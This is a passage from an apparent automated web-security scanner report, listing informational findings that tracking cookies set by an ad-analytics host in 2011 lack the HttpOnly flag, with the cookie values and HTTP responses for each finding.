rsi_segs_1000000=pUPF5EOheQIMpzaxu2F29/z47hsEu65JSW8locAzObnhu4IU3vheM3NskvAjloepK61+AvNQGTGFQ+NxcERbW0Tk562ZjYVCSktDvquDMuuBPQjky/IaNaHE1yGXKzaXaBtH5FPnD6taOU3kVsstlxUvHpxx6jjOYyhPvK7n93Kw1M0xFI9oCqQrDls54EVd2af/P+mr4aIUPtDx67xLmPpSli0jZnVB+zAH/bUTVGVQ3bV/3ZM6XBUrfzgcgkl2NqBfNMacOQA1RtyEdAjscD9S6p+JJrsiYejEsVMa5Gcu58i5u9wMWeriE1+VRrP9GWoISVWsDPdvokl9gbLDdDdyEpZEzMU8TTcyDl4MTQ96wnq89UFYUu1exqd5bvfKOgd/ZS5VS4ASCQ/Bwq3Y6odsBcs1r0dH9Bdd7XFzvxy8buM3hyPhb38UyCaoMKH2FbmG7qbETfJ+iUcStl07WmLBcrwkxFT74l1sh7H1RXN2o49jramPHPxstlTbUbQ5HErONzX7Ba/SBBXPx1ncISsuK0TnDSB0/jUoLnAdvWGvSb7qIXU95z+1R9Olfwa/tX7EcaLWgFrOmy6Xv8IGQvUjgEzB0GqapaOF4PjMZ33qklQpoN3TigM4azUpRY5SR6o4ubpSwkMCV41n0BMVeEWjeG8UfMo8LjmHBA==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 12:07:27 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOheQIMpzaxu2F29/z47hsEu65JSW8locAzObnhu4IU3vheM3NskvAjloepK61+AvNQGTGFQ+NxcERbW0Tk562ZjYVCSktDvquDMuuBPQjky/IaNaHE1yGXKzaXaBtH5FPnD6taOU3kVsstlxUvHpxx6jjOYyhPvK7n93Kw1M0xFI9oCqQrDls54EVd2af/P+mr4aIUPtDx67xLmPpSli0jZnVB+zAH/bUTVGVQ3bV/3ZM6XBUrfzgcgkl2NqBfNMacOQA1RtyEdAjscD9S6p+JJrsiYejEsVMa5Gcu58i5u9wMWeriE1+VRrP9GWoISVWsDPdvokl9gbLDdDdyEpZEzMU8TTcyDl4MTQ96wnq89UFYUu1exqd5bvfKOgd/ZS5VS4ASCQ/Bwq3Y6odsBcs1r0dH9Bdd7XFzvxy8buM3hyPhb38UyCaoMKH2FbmG7qbETfJ+iUcStl07WmLBcrwkxFT74l1sh7H1RXN2o49jramPHPxstlTbUbQ5HErONzX7Ba/SBBXPx1ncISsuK0TnDSB0/jUoLnAdvWGvSb7qIXU95z+1R9Olfwa/tX7EcaLWgFrOmy6Xv8IGQvUjgEzB0GqapaOF4PjMZ33qklQpoN3TigM4azUpRY5SR6o4ubpSwkMCV41n0BMVeEWjeG8UfMo8LjmHBA==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 12:07:27 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 12:07:26 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.217. http://pix04.revsci.net/I10985/b3/0/3/1008211/7130573.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/7130573.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOheXIQT7uItGF29/yo/tk8g7ZPQt+kIGTNsTU0ubO+NPCoReJg2v9kDss6IjP7s29IXDth7pVoc/oDyMfOQNUcbAGu3hxKy8B0iOCdNRbrR+EXBeFEV7Q/js8LsMFdUhDjs7NaErU8PMoCgVgff6p/HkTxSGDMg07rZiGYBIaY+6MFqw3p7qqa5kwP+g4bxF/asWvUviBZ+z6uGLjYPQKta/T7it1fuG0W0EJJGtMxk3W1s714eBqcBuzsemb4n0L++jvg4A+VMply718+zXAXl6qOpbglGw4aSr289n0jhzG0/TdWlDQ493y9kbAvoUn4mYYWEnNmEHHMOtBZJNCZ1aBtwqzcc/t9H7oqiGYornXErD3eSs6xQ4ErttD5Jnq4QmHuykUIjy7fo3wmSPlKfIoVN27ZyCeeKeivwEYPC1GsDA47t0nNgnBYI3cPPTUlzvUjSchlwUix8cw9WutYc4yd0N5Le6hD4JqBP2kPoNQM8Q2VcBtrLKGxlaLEixms2T8rRrkIyabl2HAzES7hMbIMbiVH6Uih8aDMyGfgJZH9qE7QSduaCJalpeBaZ3QnazCPCV9mXeWzxpYNIkHkqgNa0RwsEKu8Co2u+iOIHZwsXd4W0Ky4aWpDyE8+ca6Y6pnWpNfg88hvg+aSNNE=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 18:58:29 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOheXIQT7uItGF29/yo/tk8g7ZPQt+kIGTNsTU0ubO+NPCoReJg2v9kDss6IjP7s29IXDth7pVoc/oDyMfOQNUcbAGu3hxKy8B0iOCdNRbrR+EXBeFEV7Q/js8LsMFdUhDjs7NaErU8PMoCgVgff6p/HkTxSGDMg07rZiGYBIaY+6MFqw3p7qqa5kwP+g4bxF/asWvUviBZ+z6uGLjYPQKta/T7it1fuG0W0EJJGtMxk3W1s714eBqcBuzsemb4n0L++jvg4A+VMply718+zXAXl6qOpbglGw4aSr289n0jhzG0/TdWlDQ493y9kbAvoUn4mYYWEnNmEHHMOtBZJNCZ1aBtwqzcc/t9H7oqiGYornXErD3eSs6xQ4ErttD5Jnq4QmHuykUIjy7fo3wmSPlKfIoVN27ZyCeeKeivwEYPC1GsDA47t0nNgnBYI3cPPTUlzvUjSchlwUix8cw9WutYc4yd0N5Le6hD4JqBP2kPoNQM8Q2VcBtrLKGxlaLEixms2T8rRrkIyabl2HAzES7hMbIMbiVH6Uih8aDMyGfgJZH9qE7QSduaCJalpeBaZ3QnazCPCV9mXeWzxpYNIkHkqgNa0RwsEKu8Co2u+iOIHZwsXd4W0Ky4aWpDyE8+ca6Y6pnWpNfg88hvg+aSNNE=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 18:58:29 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 18:58:28 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.218. http://pix04.revsci.net/I10985/b3/0/3/1008211/715243108.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/715243108.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47hsEu65JwXolocE02QQ4O3XYcv0liHtqFncA2iMgL2Isw+3QQxCrpZz4WDbWjIKteif4fOffjX8iq0xsqPPwv6rrUdcIwSmkFGWlAUMTmYjtIJpyfP4P6/Ql+5XrH+SP65Ffqe16M3wgUTl9ZjjhbqaES50QAhloD6YIMfvrDyarDh6IoZrtSvTCk8LjesfMWQVRxwab1CLpZaOWmsitT5Y0P/+hoNIUEKljBrDPYeWXhjriypfjxvHkFnxuX4VXsMcQ5xnwEUjm/Rc6qb1FabBxQ8EKzz8vsWQ/OqU23h7yjaEmxKbmSdyhWthxJadkgcdRrRFzpo1Nh+z72spGNLXT62mRuq7ef0ICZMxwshGjff2njGHZyx8cEyzVGx1jDZ62LHzyj9MlKLcxpnDR+oIHbH2WGOkU80W7iI0DrptPJGzVJ25jpy6l0cKZYLjs9AdoIbkOrEn0EkoMpx8cssfJYS+UFSE6Y7m2Ml9BwY1PdwJgSNEMnePEIHIjPWxteWc6m1JncZkK9nDuxHWxj8jyy+9ctaeTrNTs6R1adeibPCMw44vZHXVcVYQb7YaQRisRwvMh8XsfKx1ikdZeRFvAR3zI8OXajA4pswprmztVXPxEd12QFkcsVBHMa+9Bm2US3w==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 18:37:46 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47hsEu65JwXolocE02QQ4O3XYcv0liHtqFncA2iMgL2Isw+3QQxCrpZz4WDbWjIKteif4fOffjX8iq0xsqPPwv6rrUdcIwSmkFGWlAUMTmYjtIJpyfP4P6/Ql+5XrH+SP65Ffqe16M3wgUTl9ZjjhbqaES50QAhloD6YIMfvrDyarDh6IoZrtSvTCk8LjesfMWQVRxwab1CLpZaOWmsitT5Y0P/+hoNIUEKljBrDPYeWXhjriypfjxvHkFnxuX4VXsMcQ5xnwEUjm/Rc6qb1FabBxQ8EKzz8vsWQ/OqU23h7yjaEmxKbmSdyhWthxJadkgcdRrRFzpo1Nh+z72spGNLXT62mRuq7ef0ICZMxwshGjff2njGHZyx8cEyzVGx1jDZ62LHzyj9MlKLcxpnDR+oIHbH2WGOkU80W7iI0DrptPJGzVJ25jpy6l0cKZYLjs9AdoIbkOrEn0EkoMpx8cssfJYS+UFSE6Y7m2Ml9BwY1PdwJgSNEMnePEIHIjPWxteWc6m1JncZkK9nDuxHWxj8jyy+9ctaeTrNTs6R1adeibPCMw44vZHXVcVYQb7YaQRisRwvMh8XsfKx1ikdZeRFvAR3zI8OXajA4pswprmztVXPxEd12QFkcsVBHMa+9Bm2US3w==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 18:37:46 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 18:37:45 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.219. http://pix04.revsci.net/I10985/b3/0/3/1008211/719321222.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/719321222.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPNJ0mFqAIQl6mdYdLQRDvQYIIfkSSOTViaZYlpwhEt6/78z0FbFgF267p/sMT/w0fqNmBL15gMQkV6teZFGMKJ0J/jnIhKaoSScicbImwMNzXmtCG7Gcvwy2l/XGe0r1BCBugCYTv6xau5qK8DrEB/pspFxMdNmeRi8E02GPKdEu6/rDLGppJHaCCytRrreBC5YV7+xd5+TyoznWmW+DMcIkB+TsGA2HdGtXu4ad1zXIEZD2/w/dFsb+y7xZOz46+WpTV9f7WHLXQU2+0qz+yrm/0ipbWyXB8ug6hzummJ6g==; Domain=.revsci.net; Expires=Sat, 16-Jun-2012 10:13:20 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPNJ0mFqAIQl6mdYdLQRDvQYIIfkSSOTViaZYlpwhEt6/78z0FbFgF267p/sMT/w0fqNmBL15gMQkV6teZFGMKJ0J/jnIhKaoSScicbImwMNzXmtCG7Gcvwy2l/XGe0r1BCBugCYTv6xau5qK8DrEB/pspFxMdNmeRi8E02GPKdEu6/rDLGppJHaCCytRrreBC5YV7+xd5+TyoznWmW+DMcIkB+TsGA2HdGtXu4ad1zXIEZD2/w/dFsb+y7xZOz46+WpTV9f7WHLXQU2+0qz+yrm/0ipbWyXB8ug6hzummJ6g==; Domain=.revsci.net; Expires=Sat, 16-Jun-2012 10:13:20 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Fri, 17 Jun 2011 10:13:19 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.220. http://pix04.revsci.net/I10985/b3/0/3/1008211/727551731.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/727551731.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5MOhunIMpzaBv3Bh9+z8rvh2rOfqAC2mBgKcDz10E2TZRRbEIyCo+UWdZpsGrYYdh3uURCSuJBT8fCZxS4dwa2TMPNHPf1Qqv8gUmPOMf6rrcddIMSklF2FdAUMTmYrtIJZ6bP4P6/Al+5VXlxUvEZzx6zjOYyj3SqVg6DjhbsoxFK9mZy09tkwFf3GUVIRr0VuIweTqtBUklZUiNu7YLMomZnVB+zCfsD5RLdiREGAyqK/XVeLTQdGLEsVKMq3qhtzkbVyc0BId9I6QTFCHzlbTXcqIfT/3Lhw6qW1HgUHFOTSkE00T9HWZ59Peawf2OKKTThxwxTRF3p3tmFunuwCSh1MilaruWDv/LMBL/nN6GCs+XDNHWVXUQEKA71DqK0K1J2FsD6ALEYUKyqAeWepreBjDQl+KtAtY7Xdie7YW1rFUFjm2t0nNgDpeUvMfjQbr3vWJV8hOjF5G0c2k9XafiUjbZ/WbcKlCgNqD/8WCkj3c3Wuey2obk8scgBwtTVfUvxerT0Q4TaM73mqCpBDmxZhu+yUoLnATqy/tiKcn75egfCW6/ffzu+7F3a9mtuDWsXOHscmzGfpK4lb7P7+dXQEywZUt0+GZ1bGuqO99Xb63z40wx5mtzZEv6/mOSOFho3792NDh4PndFghoGw==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 14:08:53 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5MOhunIMpzaBv3Bh9+z8rvh2rOfqAC2mBgKcDz10E2TZRRbEIyCo+UWdZpsGrYYdh3uURCSuJBT8fCZxS4dwa2TMPNHPf1Qqv8gUmPOMf6rrcddIMSklF2FdAUMTmYrtIJZ6bP4P6/Al+5VXlxUvEZzx6zjOYyj3SqVg6DjhbsoxFK9mZy09tkwFf3GUVIRr0VuIweTqtBUklZUiNu7YLMomZnVB+zCfsD5RLdiREGAyqK/XVeLTQdGLEsVKMq3qhtzkbVyc0BId9I6QTFCHzlbTXcqIfT/3Lhw6qW1HgUHFOTSkE00T9HWZ59Peawf2OKKTThxwxTRF3p3tmFunuwCSh1MilaruWDv/LMBL/nN6GCs+XDNHWVXUQEKA71DqK0K1J2FsD6ALEYUKyqAeWepreBjDQl+KtAtY7Xdie7YW1rFUFjm2t0nNgDpeUvMfjQbr3vWJV8hOjF5G0c2k9XafiUjbZ/WbcKlCgNqD/8WCkj3c3Wuey2obk8scgBwtTVfUvxerT0Q4TaM73mqCpBDmxZhu+yUoLnATqy/tiKcn75egfCW6/ffzu+7F3a9mtuDWsXOHscmzGfpK4lb7P7+dXQEywZUt0+GZ1bGuqO99Xb63z40wx5mtzZEv6/mOSOFho3792NDh4PndFghoGw==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 14:08:53 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 14:08:52 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.221. http://pix04.revsci.net/I10985/b3/0/3/1008211/743305953.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/743305953.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOhOHMQT7uItGF29vyo/tk8g7ZPQp/FTCAB2QQ4O3XY0n+Y1T9p9LQR/PMkrQWV5q//GhmELDb2WDbVjIJteif4fOffjX8iq0xsqPPwv6rrUdcIwSmkFOWlzUMTmbjeI5py/GeW6vTj+wWQEAWvERCASNKUW1ejPcGmrIUMmJ/o5PxXjqVBdRDmufS+NYRr1Q+VnhvMCavKi8EDZe5QGsI+pkIh9yzH3rUTaGWWXQU0Ed6h3BIUCMlj2TArZOWXhnqVDhmJxfG1UR86XEiHrbbTnQKw+T6i+Wvf1e5Hg2E7p9yWQaV+9HWbZ0C78wJipEuzcz1yT+HlOtRu/EmYN9zeCWWaqwRlov0oxjsNeu2+lYr7BP/bxWFcXC1xKsPTtMbc8XnixKis2l+N3se7jHFkeQJh7tu1xdJ4Kjb8bCs31iSkOEOguNJRWKb9cIpJN1INL7RIiU3lSBLt1wGx1JyV7z9JBhn/5/LhztSBArx9QwfGZXN0Lbk6M79eT/3+cOXz8vI9WmFIBkVY8jHk+hy/QhzLLFqhPfF3QeYfcnkfI6kItnYJN04FPGH8JvyZk5CgNRKHSQw0cLNwnCnp3H2FVPBeApsnc+bPQELVw7zHIz+Awb0w5kLYRZFv5z25yO3tlbXMIhYgOcVdvYvqNNw=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 16:18:01 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOHMQT7uItGF29vyo/tk8g7ZPQp/FTCAB2QQ4O3XY0n+Y1T9p9LQR/PMkrQWV5q//GhmELDb2WDbVjIJteif4fOffjX8iq0xsqPPwv6rrUdcIwSmkFOWlzUMTmbjeI5py/GeW6vTj+wWQEAWvERCASNKUW1ejPcGmrIUMmJ/o5PxXjqVBdRDmufS+NYRr1Q+VnhvMCavKi8EDZe5QGsI+pkIh9yzH3rUTaGWWXQU0Ed6h3BIUCMlj2TArZOWXhnqVDhmJxfG1UR86XEiHrbbTnQKw+T6i+Wvf1e5Hg2E7p9yWQaV+9HWbZ0C78wJipEuzcz1yT+HlOtRu/EmYN9zeCWWaqwRlov0oxjsNeu2+lYr7BP/bxWFcXC1xKsPTtMbc8XnixKis2l+N3se7jHFkeQJh7tu1xdJ4Kjb8bCs31iSkOEOguNJRWKb9cIpJN1INL7RIiU3lSBLt1wGx1JyV7z9JBhn/5/LhztSBArx9QwfGZXN0Lbk6M79eT/3+cOXz8vI9WmFIBkVY8jHk+hy/QhzLLFqhPfF3QeYfcnkfI6kItnYJN04FPGH8JvyZk5CgNRKHSQw0cLNwnCnp3H2FVPBeApsnc+bPQELVw7zHIz+Awb0w5kLYRZFv5z25yO3tlbXMIhYgOcVdvYvqNNw=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 16:18:01 GMT; Path=/
X-Proc-ms: 3
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 16:18:01 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.222. http://pix04.revsci.net/I10985/b3/0/3/1008211/743306396.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/743306396.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnY4hOkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrUXETRdDjDrhFtW8Q3YBu7LH0BpOZEkQ7qgbtIpSGhnXHaGeIdDCL4J/EIpOfB2LpopMTQBonSYtNsSOFv3mTmNF6kgYFHWqkKotp3Ph6zGsbpHmcoVxKLDjaQ1ChU6atbm5fFWrFFMTh5ZihsyERjUDjxTeKWeKeRY0gNIwIlZkQZOLlk8uZfxFeqiNuC1rBBItAl4Lntw6epFlDHMO4w/LnMOPcO16hfaP1c2HXavcINK+Ha6jdzz882yisW4ZNXZ0/EfYV6qz6m/ZYwwogtLmNexg3zwQvHA7cimsoGkc/zKBFmhTLYOk3JVzYm/8hG9pSKUUhwaiKvYsTVArhovtcyX8hYUhv01pHi7zlqUdxGLqcaO1H6VCi8cDciF/ZP4ms7zKN2uHCi5MyRzA038Wznt+lmcN1ePCUy4Znt1LIBdpwYVX8Ixvp6/6oo3uaQyuE+Oc5jUUhPy8bwGC775SChwg8S5OmUN8MQxPOaP02; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 15:00:32 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnY4hOkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrUXETRdDjDrhFtW8Q3YBu7LH0BpOZEkQ7qgbtIpSGhnXHaGeIdDCL4J/EIpOfB2LpopMTQBonSYtNsSOFv3mTmNF6kgYFHWqkKotp3Ph6zGsbpHmcoVxKLDjaQ1ChU6atbm5fFWrFFMTh5ZihsyERjUDjxTeKWeKeRY0gNIwIlZkQZOLlk8uZfxFeqiNuC1rBBItAl4Lntw6epFlDHMO4w/LnMOPcO16hfaP1c2HXavcINK+Ha6jdzz882yisW4ZNXZ0/EfYV6qz6m/ZYwwogtLmNexg3zwQvHA7cimsoGkc/zKBFmhTLYOk3JVzYm/8hG9pSKUUhwaiKvYsTVArhovtcyX8hYUhv01pHi7zlqUdxGLqcaO1H6VCi8cDciF/ZP4ms7zKN2uHCi5MyRzA038Wznt+lmcN1ePCUy4Znt1LIBdpwYVX8Ixvp6/6oo3uaQyuE+Oc5jUUhPy8bwGC775SChwg8S5OmUN8MQxPOaP02; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 15:00:32 GMT; Path=/
X-Proc-ms: 3
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 15:00:32 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.223. http://pix04.revsci.net/I10985/b3/0/3/1008211/747675233.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/747675233.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7U1qHNUdlHLPM5AqF7BNa0pYflQcV79fjL0tuNsq1PBC4dQFP7CuHjAC6pOp24XOz79cZhArDSL9bvUudrTRvEIroA4NCzad0MsU2sXKSNtkRN4Gq5YX61eq3sz4DxD58sbq+VGlvjNo1C2NsLJvYHpIaxKEcAVCfYNFuiJW9Ld6LCksMDycjv5iOP60aUROV32LGj6skxKEfVMjClll66J4IEP/xpmdrbkw2u1kTEZnZn+uDtlgoahVnyL84qaC73ti4HPMP6DDXwgyzvy3zXjb9F8x4cUAH+mu25iz/7xFtrTMDRXohiE7z0OhT3yWVMDmAvayqLMJWypL5ig0W+H0hIkdRrpoDA==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 18:42:57 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
